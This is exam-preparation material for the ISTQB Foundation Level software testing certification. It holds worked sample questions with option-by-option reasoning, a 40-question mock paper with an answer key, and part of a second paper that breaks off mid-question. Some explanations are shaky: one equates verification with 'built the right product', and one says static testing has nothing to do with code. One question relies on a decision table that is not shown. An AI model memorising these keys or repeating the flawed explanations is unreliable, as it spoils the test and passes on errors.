People often choose the one, which they are more familiar with. We should carefully read
the question twice or thrice or may be more than that, till we are clear about what is being
asked in the question.
Now look at the options carefully. The options are chosen to confuse the candidates. To
choose the correct answer, we should start eliminating one by one. Go through each option
and check whether it is appropriate or not. If you end up selecting more than one option,
repeat the above logic for the answers that you selected. This will definitely work.

Before you start with the question papers, please read the material thoroughly. Practice as
many papers as possible. This will help a lot because, when we actually solve the papers,
we apply the logic that we know.

ISTQB ‘Foundation level’ sample questions with answers:


1. Designing the test environment set-up and identifying any required
infrastructure and tools are a part of which phase
a) Test Implementation and execution
b) Test Analysis and Design
c) Evaluating the Exit Criteria and reporting
d) Test Closure Activities
Evaluating the options:
a) Option a: as the name suggests these activities are part of the actual implementation
cycle. So do not fall under set-up
b) Option b: Analysis and design activities come before implementation. The test
environment set-up, identifying any required infrastructure and tools are part of this
activity.
c) Option c: These are post implementation activities
d) Option d: These are related to closing activities. This is the last activity.
So, the answer is ‘B’
2. Test Implementation and execution has which of the following major tasks?
i. Developing and prioritizing test cases, creating test data, writing test procedures and
optionally preparing the test harnesses and writing automated test scripts.
ii. Creating the test suite from the test cases for efficient test execution.
iii. Verifying that the test environment has been set up correctly.
iv. Determining the exit criteria.
a) i,ii,iii are true and iv is false
b) i,,iv are true and ii is false
c) i,ii are true and iii,iv are false
d) ii,iii,iv are true and i is false
Evaluating the options:
Let’s follow a different approach in this case. As can be seen from the above options,
determining the exit criteria is definitely not a part of test implementation and execution. So
choose the options where (iv) is false. This filters out ‘b’ and ‘d’.
We need to select only from ‘a’ and ‘c’. We only need to analyze option (iii) as (i) and (ii)
are marked as true in both the cases. Verification of the test environment is part of the
implementation activity. Hence option (iii) is true. This leaves the only option as ‘a’.

So, the answer is ‘A’


3. A Test Plan Outline contains which of the following:-
i. Test Items
ii. Test Scripts
iii. Test Deliverables
iv. Responsibilities
a) I,ii,iii are true and iv is false
b) i,iii,iv are true and ii is false
c) ii,iii are true and i and iv are false
d) i,ii are false and iii , iv are true
Evaluating the options:
Let’s use the approach given in question no. 2. Test scripts are not part of the test plan (this
must be clear). So choose the options where (ii) is false. So we end up selecting ‘b’ and ‘d’.
Now evaluate the option (i), as option (iii) and (iv) are already given as true in both the
cases. Test items are part of the test plan. Test items are the modules or features which will
be tested and these will be part of the test plan.
So, the answer is ‘B’
4. One of the fields on a form contains a text box which accepts numeric values in
the range of 18 to 25. Identify the invalid Equivalence class
a) 17
b) 19
c) 24
d) 21
Evaluating the options:
In this case, first we should identify valid and invalid equivalence classes.
Invalid Class | Valid Class | Invalid Class
Below 18 | 18 to 25 | 26 and above
Option ‘a’ falls under invalid class. Options ‘b’, ‘c’ and ‘d’ fall under valid class.

So, the answer is ‘A’


5. In an Examination a candidate has to score minimum of 24 marks in order to
clear the exam. The maximum that he can score is 40 marks. Identify the Valid
Equivalence values if the student clears the exam.
a) 22,23,26
b) 21,39,40
c) 29,30,31
d) 0,15,22
Evaluating the options:
Let’s use the approach given in question 4. Identify valid and invalid equivalence classes.
Invalid Class | Valid Class | Invalid Class
Below 24 | 24 to 40 | 41 and above
The question is to identify valid equivalence values. So all the values must be from ‘Valid
class’ only.

a) Option a: all the values are not from valid class


b) Option b: all the values are not from valid class
c) Option c: all the values are from valid class
d) Option d: all the values are not from valid class
So, the answer is ‘C’
6. Which of the following statements regarding static testing is false:
a) static testing requires the running of tests through the code
b) static testing includes desk checking
c) static testing includes techniques such as reviews and inspections
d) static testing can give measurements such as cyclomatic complexity
Evaluating the options:
a) Option a: is wrong. Static testing has nothing to do with code
b) Option b: correct, static testing does include desk checking
c) Option c: correct, it includes reviews and inspections
d) Option d: correct, it can give measurements such as cyclomatic complexity
So, the answer is ‘A’
7. Verification involves which of the following:-
i. Helps to check the Quality of the built product
ii. Helps to check that we have built the right product.
iii. Helps in developing the product
iv. Monitoring tool wastage and obsoleteness.
a) Options i,ii,iii,iv are true.
b) i is true and ii,iii,iv are false
c) i,ii,iii are true and iv is false
d) ii is true and i,iii,iv are false.
Evaluating the options:
a) Option a: The quality of the product can be checked only after building it.
Verification is a cycle before completing the product.
b) Option b: Verification checks that we have built the right product.
c) Option c: it does not help in developing the product
d) Option d: it does not involve monitory activities.
So, the answer is ‘B’
8. Component Testing is also called as :-
i. Unit Testing
ii. Program Testing
iii. Module Testing
iv. System Component Testing .
a) i,ii,iii are true and iv is false
b) i,ii,iii,iv are false
c) i,ii,iv are true and iii is false
d) all of above is true
Evaluating the options:
a) Option a: correct, component testing is also called as unit testing
b) Option b: not sure (but as all the options indicate this as true, we can conclude that
Program testing is also called as unit testing)
c) Option c: correct, component testing is also called as module testing
d) Option d: wrong. System component testing comes under system testing.
So, the answer is ‘A’
9. Link Testing is also called as :
a) Component Integration testing
b) Component System Testing
c) Component Sub System Testing
d) Maintenance testing
Evaluating the options:
As the name suggests, this testing is performed by linking (say modules). Now if
we look at the options, only option ‘a’ is performed by linking or integrating
modules/components.
So, the answer is ‘A’
10.

What is the expected result for each of the following test cases?
A.TC1: Anand is a 32 year old married, residing in Kolkatta.
B.TC3: Attapattu is a 65 year old married person, residing in Colombo.
a) A – Issue membership, 10% discount, B–Issue membership, offer no discount. B
b) A – Don’t Issue membership, B – Don’t offer discount. C
c) A – Issue membership, no discount, B – Don’t Issue membership.
d) A – Issue membership, no discount, B- Issue membership with 10% discount.
Evaluating the options:

Explanation:
For TC1: follow the path in green color
(The person is Indian resident, so select only ‘True’ options.
The person is aged between 18-55, so select only ‘True’
The person is a married, so again select only ‘True’
For this person, the actions under ‘Rule 4′ will be applied. That is, issue membership and no
discount)
For TC3: follow the path in blue color
(The person is not Indian resident, so select only ‘False’ (under Rule 1)
The person is not aged between 18-55. No need to select any path, as it is written “Don’t
care”.
The person is married. No need to select any path, as it is written “Don’t care”.
For this person, the actions under ‘Rule1′ will be applied, That is, Don’t issue membership
and no discount.)
So, the answer is ‘C’
Note: The answers are based on writers own experience and judgment and may not be
100% correct. If you feel any correction is required please discuss in comments below.

ISTQB software testing certification sample


question paper with answers – Part II
In continuation with ourPrevious article on “ISTQB software testing certification
sample papers and tips to solve the questions quickly“, we are posting next set of
ISTQB exam sample questions and answers with detailed evaluation for each option.
This is a guest article by “N. Sandhya Rani”.
ISTQB ‘Foundation level’ sample questions with answers and detailed evaluation
of each option:
1. Methodologies adopted while performing Maintenance Testing:-
a) Breadth Test and Depth Test
b) Retesting
c) Confirmation Testing
d) Sanity Testing
Evaluating the options:
a) Option a: Breadth testing is a test suite that exercises the full functionality of a product
but does not test features in detail. Depth testing is a test that exercises a feature of a
product in full detail.
b) Option b: Retesting is part of regression
c) Option c: Confirmation testing is a synonym for retesting
d) Option d: Sanity testing does not include full functionality
Maintenance testing includes testing some features in detail (for e.g. environment) and for
some features detail testing is not required. It’s a mix of both breadth and depth testing.
So, the answer is ‘A’
2. Which of the following is true about Formal Review or Inspection:-
i. Led by Trained Moderator (not the author).
ii. No Pre Meeting Preparations
iii. Formal Follow up process.
iv. Main Objective is to find defects
a) ii is true and i,iii,iv are false
b) i,iii,iv are true and ii is false
c) i,iii,iv are false and ii is true
d) iii is true and i,ii,iv are false
Evaluating the options:
Consider the first point (i). This is true, Inspection is led by trained moderator. Hence we
can eliminate options (a) and (d). Now consider second point. In Inspection pre-meeting
preparation is required. So this point is false. Look for option where (i) is true and (ii) is
false.
The answer is ‘B’
3. The Phases of formal review process is mentioned below arrange them in the
correct order.

i. Planning
ii. Review Meeting
iii. Rework
iv. Individual Preparations
v. Kick Off
vi. Follow Up
a) i,ii,iii,iv,v,vi
b) vi,i,ii,iii,iv,v
c) i,v,iv,ii,iii,vi
d) i,ii,iii,v,iv,vi
Evaluating the options:
Formal review process is ’Inspection’. Planning is foremost step. Hence we can eliminate
option ’b’. Now we need to kickoff the process, so the second step will be Kick off. That’s it
we found the answer. Its ’C’
The answer is ’C’

4. Consider the following state transition diagram of a two-speed hair dryer, which
is operated by pressing its one button. The first press of the button turns it on to
Speed 1, second press to Speed 2 and the third press turns it off.

Which of the following series of state transitions below will provide 0-switch coverage?
a. A,C,B
b. B,C,A
c. A,B,C
d. C,B,A
Evaluating the options:
In State transition testing a test is defined for each state transition. The coverage that is
achieved by this testing is called 0-switch or branch coverage. 0-switch coverage is to
execute each loop once (No repetition. We should start with initial state and go till end
state. It does not test ‘sequence of two state transitions’). In this case the start state is
‘OFF’, and then press of the button turns it on to Speed 1 (i.e. A). Second press turns it on
to Speed 2 (i.e. B) and the third press turns it off (i.e. C). Here we do not test the
combinations like what if the start state is ‘Speed 1’ or ‘Speed 2’ etc.
An alternate way of solving this is check for the options where it starts with ‘OFF’ state. So
we have options ‘a’ and ‘c’ to select from. As per the state diagram from ‘OFF’ state the
dryer goes to ‘Speed 1’ and then to ‘Speed 2’. So our answer should start with ‘A’ and end
with ‘C’.

The answer is ’C’


5. White Box Techniques are also called as :-
a) Structural Testing
b) Design Based Testing
c) Error Guessing Technique
d) Experience Based Technique
Evaluating the options:
I guess no evaluation is required here. It’s a straight answer. White box techniques are also
called as Structural testing. (as it is done using code)
The answer is ‘A’
6. What is an equivalence partition (also known as an equivalence class)?
a) A set of test cases for testing classes of objects
b) An input or output range of values such that only one value in the range becomes a test
case
c) An input or output range of values such that each value in the range becomes a test case
d) An input or output range of values such that every tenth value in the range becomes a
test case.
Evaluating the options:
Let’s recall the definition of equivalence partition. It is grouping inputs into valid and invalid
classes. Hence any one value from one particular class forms an input. For e.g. input a valid
class contains values from 3-5, then any value between 3-5 is considered as an input. All
values are supposed to yield same output. Hence one value in this range becomes a test
case.
The answer is ‘B’
7. The Test Cases Derived from use cases
a) Are most useful in uncovering defects in the process flows during real world use of the
system
b) Are most useful in uncovering defects in the process flows during the testing use of the
system
c) Are most useful in covering the defects in the process flows during real world use of the
system
d) Are most useful in covering the defects at the Integration Level
Evaluating the options:
Please refer to Use case related topic in the foundation level guide “Use cases describe the
“process flows” through a system based on its actual likely use” (actual likely use is nothing
but the real world use of the system). Use cases are useful for uncovering defects. Hence
we can eliminate options (c ) and (d). Use case uncovers defects in process flow during real
world use of the system.
The answer is ‘A’
8. Exhaustive Testing is
a) Is impractical but possible
b) Is practically possible
c) Is impractical and impossible
d) Is always possible
Evaluating the options:
From the definition given in the syllabus, Exhaustive testing is impossible. But it is possible
in trivial cases. Exhaustive testing is not always possible. So eliminate option ‘d’. It is not
impossible also. So eliminate option ‘c’. But implementing is impractical. Hence we can
conclude that exhaustive testing is impractical but possible
The answer is ‘A’
9. Which of the following is not a part of the Test Implementation and Execution
Phase
a) Creating test suites from the test cases
b) Executing test cases either manually or by using test execution tools
c) Comparing actual results
d) Designing the Tests
Evaluating the options:
Please take care of the word ‘not’ in the question. Test implementation does include
Creating test suites, executing and comparing results. Hence eliminate options a, b and c.
The only option left is ‘D’. Designing activities come before implementation.
The answer is ‘D’
10. Which of the following techniques is NOT a White box technique?
a) Statement Testing and coverage
b) Decision Testing and coverage
c) Condition Coverage
d) Boundary value analysis
Evaluating the options:
Please take care of the word ‘not’ in the question. We have to choose the one which is not a
part of white box technique. Statement, decision, condition are the terms used in white box.
So eliminate options a, b and c. Boundary value is part of black box.
The answer is ‘D’
11. A Project risk includes which of the following
a) Organizational Factors
b) Poor Software characteristics
c) Error Prone software delivered.
d) Software that does not perform its intended functions
Evaluating the options:
a) Option a: Organizational factors can be part of project risk.
b) Option b: Poor software characteristics are part of software. Its not a risk
c) Option c: Error prone software delivered. Again it’s a part of software.
d) Option d: Software that does not perform its intended functions. Again it’s a part of
software.
The answer is ‘A’
12. In a risk-based approach the risks identified may be used to :
i. Determine the test technique to be employed
ii. Determine the extent of testing to be carried out
iii. Prioritize testing in an attempt to find critical defects as early as possible.
iv. Determine the cost of the project
a) ii is True; i, iii, iv & v are False
b) i,ii,iii are true and iv is false
c) ii & iii are True; i, iv are False
d) ii, iii & iv are True; i is false
Evaluating the options:
a) Option a: Risks identified can be used to determine the test technique.
b) Option b: Risks can be used to determine the extent of testing required. For e.g. if there
are P1 bugs in a software, then it is a risk to release it. Hence we can increase the testing
cycle to reduce the risk
c) Option c: If risk areas are identified before hand, then we can prioritize testing to find
defects asap.
d) Option d: Risk does not determine the cost of the project. It determines the impact on
the project as a whole.
Check for the option where first 3 points are true. Its ‘B’
The answer is ‘B’
13. Which of the following is the task of a Tester?
i. Interaction with the Test Tool Vendor to identify best ways to leverage test tool on the
project.
ii. Prepare and acquire Test Data
iii. Implement Tests on all test levels, execute and log the tests.
iv. Create the Test Specifications
a) i, ii, iii is true and iv is false
b) ii,iii,iv is true and i is false
c) i is true and ii,iii,iv are false
d) iii and iv is correct and i and ii are incorrect
Evaluating the options:
Not much explanation is needed in this case. As a tester, we do all the activities mentioned
in options (ii), (iii) and (iv).
The answer is ‘B’
14. The Planning phase of a formal review includes the following :-
a) Explaining the objectives
b) Selecting the personnel, allocating roles.
c) Follow up
d) Individual Meeting preparations
Evaluating the options:
In this case, elimination will work best. Follow-up is not a planning activity. It’s a post task.
Hence eliminate option ‘b’. Individual meeting preparation is an activity for individual. It’s
not a planning activity. Hence eliminate option ‘d’. Now we are left with 2 options ‘a’ and ‘b’,
read those 2-3 times. We can identify that option ‘b’ is most appropriate. Planning phase of
formal review does include selecting personnel and allocation of roles. Explaining the
objectives is not part of review process. (this is also written in the FL syllabus)
The answer is ‘B’
15. A Person who documents all the issues, problems and open points that were
identified during a formal review.
a) Moderator.
b) Scribe
c) Author
d) Manager
Evaluating the options:
I hope there is not confusion here. The answer is scribe.
The answer is ‘B’
16. Who are the persons involved in a Formal Review :-
i. Manager
ii. Moderator
iii. Scribe / Recorder
iv. Assistant Manager
a) i,ii,iii,iv are true
b) i,ii,iii are true and iv is false.
c) ii,iii,iv are true and i is false.
d) i,iv are true and ii, iii are false.
Evaluating the options:
The question is regarding formal review, means Inspection. First we will try to identify the
persons that we are familiar w.r.t Inspection. Manager, Moderator and Scribe are involved in
Inspection. So now we have only first 2 options to select from. (other 2 options are
eliminated). There is no assistant manager in Inspection.
The answer is ‘B’
17. Which of the following is a Key Characteristics of Walk Through
a) Scenario , Dry Run , Peer Group
b) Pre Meeting Preparations
c) Formal Follow Up Process
d) Includes Metrics
Evaluating the options:
Pre meeting preparation is part of Inspection. Also Walk through is not a formal process.
Metrics are part of Inspection. Hence eliminating ‘b’, ‘c’ and ‘d’.
The answer is ‘A’
18. What can static analysis NOT find?
a) the use of a variable before it has been defined
b) unreachable (“dead”) code
c) memory leaks
d) array bound violations
Evaluating the options:
Static analysis cover all the above options except ‘Memory leaks’. (Please refer to the FL
syllabus. Its written clearly over there)
The answer is ‘C’
19. Incidents would not be raised against:
a) requirements
b) documentation
c) test cases
d) improvements suggested by users
Evaluating the options:
The first three options are obvious options for which incidents are raised. The last option
can be thought as an enhancement. It is a suggestion from the users and not an incident.
The answer is ‘D’
20. A Type of functional Testing, which investigates the functions relating to
detection of threats, such as virus from malicious outsiders.
a) Security Testing
b) Recovery Testing
c) Performance Testing
d) Functionality Testing
Evaluating the options:
The terms used in the question like detection of threats, virus etc point towards the security
issues. Also security testing is a part of Functional testing. In security testing we investigate
the threats from malicious outsiders etc.
The answer is ‘A’
21. Which of the following is not a major task of Exit criteria?
a) Checking test logs against the exit criteria specified in test planning.
b) Logging the outcome of test execution.
c) Assessing if more tests are needed.
d) Writing a test summary report for stakeholders.
Evaluating the options:
The question is about ‘not’ a major task. Option ‘a’ is a major task. So eliminate this. Option
‘b’ is not a major task. (But yes, logging of outcome is important). Option ‘c’ and ‘d’ both
are major tasks of Exit criteria. So eliminate these two.
The answer is ‘B’
22. Testing where in we subject the target of the test , to varying workloads to
measure and evaluate the performance behaviors and ability of the target and of
the test to continue to function properly under these different workloads.
a) Load Testing
b) Integration Testing
c) System Testing
d) Usability Testing
Evaluating the options:
Workloads, performance are terms that come under Load testing. Also as can be seen from
the other options, they are not related to load testing. So we can eliminate them.
The answer is ‘A’
23. Testing activity which is performed to expose defects in the interfaces and in
the interaction between integrated components is :-
a) System Level Testing
b) Integration Level Testing
c) Unit Level Testing
d) Component Testing
Evaluating the options:
We have to identify the testing activity which finds defects which occur due to interaction or
integration. Option ‘a’ is not related to integration. Option ‘c’ is unit testing. Option ‘d’
component is again a synonym for unit testing. Hence eliminating these three options.
The answer is ‘B’
24. Static analysis is best described as:
a) The analysis of batch programs.
b) The reviewing of test plans.
c) The analysis of program code.
d) The use of black box testing.
Evaluating the options:
In this case we have to choose an option, which ‘best’ describes static analysis. Most of the
options given here are very close to each other. We have to carefully read them.
a) Option a: Analysis is part of static analysis. But is not the best option which describes
static analysis.
b) Option b: Reviews are part of static analysis. But is not the best option which describes
static analysis.
c) Option c: Static analysis does analyze program code.
d) Option d: This option ca be ruled out, as black box is a dynamic testing.
The answer is ‘C’
25. One of the fields on a form contains a text box which accepts alpha numeric
values. Identify the Valid Equivalence class
a) BOOK
b) Book
c) Boo01k
d) book
Evaluating the options:
As we know, alpha numeric is combination of alphabets and numbers. Hence we have to
choose an option which has both of these.
a. Option a: contains only alphabets. (to create confusion they are given in capitals)
b. Option b: contains only alphabets. (the only difference from above option is that all
letters are not in capitals)
c. Option c: contains both alphabets and numbers
d. Option d: contains only alphabets but in lower case
The answer is ‘C’
26. Reviewing the test Basis is a part of which phase
a) Test Analysis and Design
b) Test Implementation and execution
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
Test basis comprise of requirements, architecture, design, interfaces. By looking at these
words, we can straight away eliminate last two options. Now option ‘a’ is about test analysis
and design. This comes under test basis. Option ‘b’ is about implementation and execution
which come after the design process. So the best option is ‘a’.
The answer is ‘A’
27. Reporting Discrepancies as incidents is a part of which phase :-
a) Test Analysis and Design
b) Test Implementation and execution
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
Incident is reporting discrepancies, in other terms its defect/bug. We find defects while
execution cycle where we execute the test cases.

The answer is ‘B’


28. Which of the following items would not come under Configuration
Management?
a) operating systems
b) test documentation
c) live data
d) user requirement document
Evaluating the options:
We have to choose an option which does ‘not’ come under Configuration Management (CM).
CM is about maintaining the integrity of the products like components, data and
documentation.
a) Option a: maintaining the Operating system configuration that has been used in the test
cycle is part of CM.
b) Option b: Test documentation is part of CM
c) Option c: Data is part of CM. but here the option is ‘live data’ which is not part of CM. The
live data keeps on changing (in real scenario).
d) Option d: Requirements and documents are again part of CM
The only option that does not fall under CM is ‘c’
The answer is ‘C’
29. Handover of Test-ware is a part of which Phase
a) Test Analysis and Design
b) Test Planning and control
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
Hand over is typically a process which is part of closure activities. It is not part of analysis,
design or planning activity. Also it is not part of evaluating exit criteria. After closure of test
cycle test-ware is handover to the maintenance organization.
The answer is ‘C’
30. The Switch is switched off once the temperature falls below 18 and then it is
turned on when the temperature is more than 21. Identify the Equivalence values
which belong to the same class.
a) 12,16,22
b) 24,27,17
c) 22,23,24
d) 14,15,19
Evaluating the options:
Read the question carefully. We have to choose values from same class. So first divide the
classes. When temperature falls below 18 switch is turned off. This forms a class (as shown
below). When the temperature is more than 21, the switch is turned on. For values between
18 to 21, no action is taken. This also forms a class as shown below.
Class I: less than 18 (switch turned off)
Class II: 18 to 21
Class III: above 21 (switch turned on)
From the given options select the option which has values from only one particular class.
Option ‘a’ values are not in one class, so eliminate. Option ‘b’ values are not in one class, so
eliminate. Option ‘c’ values are in one class. Option ‘d’ values are not in one class, so
eliminate. (please note that the question does not talk about valid or invalid classes. It is
only about values in same class)

The answer is ‘C’


About the Author:
“N. Sandhya Rani” is having around 4 years of experience in software testing mostly in
manual testing. She is helping many aspirant software testers to clear the ISTQB testing
certification exam by giving tips on how to solve the multiple choice questions correctly with
evaluating each option quickly.
ISTQB Testing Certification Sample Question
Papers With Answers
If you are preparing for ISTQB foundation level certification exam then here are some
sample question papers to make your preparation little easier.
Each ISTQB mock test contains 40 questions and answers are provided at the end of the
page. Mark all answers on separate paper first and then compare the results with answers
provided. Try to finish these 40 questions in one hour duration.

ISTQB/ISEB Foundation level exam sample paper 1


ISTQB/ISEB Foundation level exam sample paper 2
ISTQB/ISEB Foundation level exam sample paper 3
If you have more ISTQB certification sample papers to share then please contact me.
We have also shared all ISTQB exam sample papers and mock tests on our resources
section. Please visit Testing Resources section to see more software testing resources and
free downloads.

ISTQB Foundation level exam Sample paper – I


ISTQB Foundation level exam Sample paper – I

Questions

1 We split testing into distinct stages primarily because:


a) Each test stage has a different purpose.
b) It is easier to manage testing in stages.
c) We can run different tests in different environments.
d) The more stages we have, the better the testing.
2 Which of the following is likely to benefit most from the use of test tools
providing test capture and replay facilities?
a) Regression testing
b) Integration testing
c) System testing
d) User acceptance testing
3 Which of the following statements is NOT correct?
a) A minimal test set that achieves 100% LCSAJ coverage will also achieve 100% branch
coverage.
b) A minimal test set that achieves 100% path coverage will also achieve 100%
statement coverage.
c) A minimal test set that achieves 100% path coverage will generally detect more faults
than one that achieves 100% statement coverage.
d) A minimal test set that achieves 100% statement coverage will generally detect more
faults than one that achieves 100% branch coverage.
4 Which of the following requirements is testable?
a) The system shall be user friendly.
b) The safety-critical parts of the system shall contain 0 faults.
c) The response time shall be less than one second for the specified design load.
d) The system shall be built to be portable.
5 Analise the following highly simplified procedure:
Ask: “What type of ticket do you require, single or return?”
IF the customer wants ‘return’
Ask: “What rate, Standard or Cheap-day?”
IF the customer replies ‘Cheap-day’
Say: “That will be £11:20″
ELSE
Say: “That will be £19:50″
ENDIF
ELSE
Say: “That will be £9:75″
ENDIF
Now decide the minimum number of tests that are needed to ensure that all
the questions have been asked, all combinations have occurred and all
replies given.
a) 3
b) 4
c) 5
d) 6
6 Error guessing:
a) supplements formal test design techniques.
b) can only be used in component, integration and system testing.
c) is only performed in user acceptance testing.
d) is not repeatable and should not be used.
7 Which of the following is NOT true of test coverage criteria?
a) Test coverage criteria can be measured in terms of items exercised by a test suite.
b) A measure of test coverage criteria is the percentage of user requirements covered.
c) A measure of test coverage criteria is the percentage of faults found.
d) Test coverage criteria are often used when specifying test completion criteria.
8 In prioritizing what to test, the most important objective is to:
a) find as many faults as possible.
b) test high risk areas.
c) obtain good test coverage.
d) test whatever is easiest to test.
9 Given the following sets of test management terms (v-z), and activity
descriptions (1-5), which one of the following best pairs the two sets?
v – test control
w – test monitoring
x – test estimation
y – incident management
z – configuration control
1 - calculation of required test resources
2 - maintenance of record of test results
3 - re-allocation of resources when tests overrun
4 - report on deviation from test plan
5 - tracking of anomalous test results
a) v-3,w-2,x-1,y-5,z-4
b) v-2,w-5,x-1,y-4,z-3
c) v-3,w-4,x-1,y-5,z-2
d) v-2,w-1,x-4,y-3,z-5
10 Which one of the following statements about system testing is NOT true?
a) System tests are often performed by independent teams.
b) Functional testing is used more than structural testing.
c) Faults found during system tests can be very expensive to fix.
d) End-users should be involved in system tests.
11 Which of the following is false?
a) Incidents should always be fixed.
b) An incident occurs when expected and actual results differ.
c) Incidents can be analysed to assist in test process improvement.
d) An incident can be raised against documentation.
12 Enough testing has been performed when:
a) time runs out.
b) the required level of confidence has been achieved.
c) no more faults are found.
d) the users won’t find any serious faults.
13 Which of the following is NOT true of incidents?
a) Incident resolution is the responsibility of the author of the software under test.
b) Incidents may be raised against user requirements.
c) Incidents require investigation and/or correction.
d) Incidents are raised when expected and actual results differ.
14 Which of the following is not described in a unit test standard?
a) syntax testing
b) equivalence partitioning
c) stress testing
d) modified condition/decision coverage
15 Which of the following is false?
a) In a system two different failures may have different severities.
b) A system is necessarily more reliable after debugging for the removal of a fault.
c) A fault need not affect the reliability of a system.
d) Undetected errors may lead to faults and eventually to incorrect behaviour.
16 Which one of the following statements, about capture-replay tools, is NOT
correct?
a) They are used to support multi-user testing.
b) They are used to capture and animate user requirements.
c) They are the most frequently purchased types of CAST tool.
d) They capture aspects of user behavior.
17 How would you estimate the amount of re-testing likely to be required?
a) Metrics from previous similar projects
b) Discussions with the development team
c) Time allocated for regression testing
d) a & b
18 Which of the following is true of the V-model?
a) It states that modules are tested against user requirements.
b) It only models the testing phase.
c) It specifies the test techniques to be used.
d) It includes the verification of designs.
19 The oracle assumption:
a) is that there is some existing system against which test output may be checked.
b) is that the tester can routinely identify the correct outcome of a test.
c) is that the tester knows everything about the software under test.
d) is that the tests are reviewed by experienced testers.
20 Which of the following characterizes the cost of faults?
a) They are cheapest to find in the early development phases and the most expensive to
fix in the latest test phases.
b) They are easiest to find during system testing but the most expensive to fix then.
c) Faults are cheapest to find in the early development phases but the most expensive to
fix then.
d) Although faults are most expensive to find during early development phases, they are
cheapest to fix then.
21 Which of the following should NOT normally be an objective for a test?
a) To find faults in the software.
b) To assess whether the software is ready for release.
c) To demonstrate that the software doesn’t work.
d) To prove that the software is correct.
22 Which of the following is a form of functional testing?
a) Boundary value analysis
b) Usability testing
c) Performance testing
d) Security testing
23 Which of the following would NOT normally form part of a test plan?
a) Features to be tested
b) Incident reports
c) Risks
d) Schedule
24 Which of these activities provides the biggest potential cost saving from the
use of CAST?
a) Test management
b) Test design
c) Test execution
d) Test planning
25 Which of the following is NOT a white box technique?
a) Statement testing
b) Path testing
c) Data flow testing
d) State transition testing
26 Data flow analysis studies:
a) possible communications bottlenecks in a program.
b) the rate of change of data values as a program executes.
c) the use of data on paths through the code.
d) the intrinsic complexity of the code.
27 In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free. The next £1500 is taxed at 10%
The next £28000 is taxed at 22%
Any further amount is taxed at 40%
To the nearest whole pound, which of these is a valid Boundary Value Analysis test case?
a) £1500
b) £32001
c) £33501
d) £28000
28 An important benefit of code inspections is that they:
a) enable the code to be tested before the execution environment is ready.
b) can be performed by the person who wrote the code.
c) can be performed by inexperienced staff.
d) are cheap to perform.
29 Which of the following is the best source of Expected Outcomes for User
Acceptance Test scripts?
a) Actual results
b) Program specification
c) User requirements
d) System specification
30 What is the main difference between a walkthrough and an inspection?
a) An inspection is lead by the author, whilst a walkthrough is lead by a trained
moderator.
b) An inspection has a trained leader, whilst a walkthrough has no leader.
c) Authors are not present during inspections, whilst they are during walkthroughs.
d) A walkthrough is lead by the author, whilst an inspection is lead by a trained
moderator.
31 Which one of the following describes the major benefit of verification early in
the life cycle?
a) It allows the identification of changes in user requirements.
b) It facilitates timely set up of the test environment.
c) It reduces defect multiplication.
d) It allows testers to become involved early in the project.
32 Integration testing in the small:
a) tests the individual components that have been developed.
b) tests interactions between modules or subsystems.
c) only uses components that form part of the live system.
d) tests interfaces to other systems.
33 Static analysis is best described as:
a) the analysis of batch programs.
b) the reviewing of test plans.
c) the analysis of program code.
d) the use of black box testing.
34 Alpha testing is:
a) post-release testing by end user representatives at the developer’s site.
b) the first testing that is performed.
c) pre-release testing by end user representatives at the developer’s site.
d) pre-release testing by end user representatives at their sites.
35 A failure is:
a) found in the software; the result of an error.
b) departure from specified behavior.
c) an incorrect step, process or data definition in a computer program.
d) a human action that produces an incorrect result.
36 In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free. The next £1500 is taxed at 10%
The next £28000 is taxed at 22%
Any further amount is taxed at 40%
Which of these groups of numbers would fall into the same equivalence class?
a) £4800; £14000; £28000
b) £5200; £5500; £28000
c) £28001; £32000; £35000
d) £5800; £28000; £32000
37 The most important thing about early test design is that it:
a) makes test preparation easier.
b) means inspections are not required.
c) can prevent fault multiplication.
d) will find all faults.
38 Which of the following statements about reviews is true?
a) Reviews cannot be performed on user requirements specifications.
b) Reviews are the least effective way of testing code.
c) Reviews are unlikely to find faults in test plans.
d) Reviews should be performed on specifications, code, and test plans.
39 Test cases are designed during:
a) test recording.
b) test planning.
c) test configuration.
d) test specification.
40 A configuration management system would NOT normally provide:
a) linkage of customer requirements to version numbers.
b) facilities to compare test results with expected results.
c) the precise differences in versions of software component source code.
d) restricted access to the source code library.
Answers for above questions:
Question Answer
1 A
2 A
3 D
4 C
5 A
6 A
7 C
8 B
9 C
10 D
11 A
12 B
13 A
14 C
15 B
16 B
17 D
18 D
19 B
20 A
21 D
22 A
23 B
24 C
25 D
26 C
27 C
28 A
29 C
30 D
31 C
32 B
33 C
34 C
35 B
36 D
37 C
38 D
39 D
40 B

ISTQB Foundation level exam Sample paper – II


Q1 A deviation from the specified or expected behavior that is visible to end-
users is called:
a) an error
b) a fault
c) a failure
d) a defect
Q2 Regression testing should be performed:
v) every week
w) after the software has changed
x) as often as possible
y) when the environment has changed
z) when the project manager says
a) v & w are true, x, y & z are false
b) w, x & y are true, v & z are false
c) w & y are true, v, x & z are false
d) w is true, v, x, y & z are false
Q3 IEEE 829 test plan documentation standard contains all of the following
except
a) test items
b) test deliverables
c) test tasks
d) test specifications
Q4 When should testing be stopped?
a) when all the planned tests have been run
b) when time has run out
c) when all faults have been fixed correctly
d) it depends on the risks for the system being tested
Q5 Order numbers on a stock control system can range between 10000 and
99999 inclusive. Which of the following inputs might be a result of designing tests
for only valid equivalence classes and valid boundaries?
a) 1000, 50000, 99999
b) 9999, 50000, 100000
c) 10000, 50000, 99999
d) 10000, 99999, 100000
Q6 Consider the following statements about early test design:
i. early test design can prevent fault multiplication
ii. faults found during early test design are more expensive to fix
iii. early test design can find faults
iv. early test design can cause changes to the requirements
v. early test design normally takes more effort
a) i, iii & iv are true; ii & v are false
b) iii & iv are true; i, ii & v are false
c) i, iii, iv & v are true; ii is false
d) i & ii are true; iii, iv & v are false
Q7 Non-functional system testing includes:
a) testing to see where the system does not function correctly
b) testing quality attributes of the system including performance and usability
c) testing a system function using only the software required for that function
d) testing for functions that should not exist
Q8 Which of the following is NOT part of configuration management?
a) auditing conformance to ISO 9000
b) status accounting of configuration items
c) identification of test versions
d) controlled library access
Q9 Which of the following is the main purpose of the integration strategy for
integration testing in the small?
a) to ensure that all of the small modules are tested adequately
b) to ensure that the system interfaces to other systems and networks
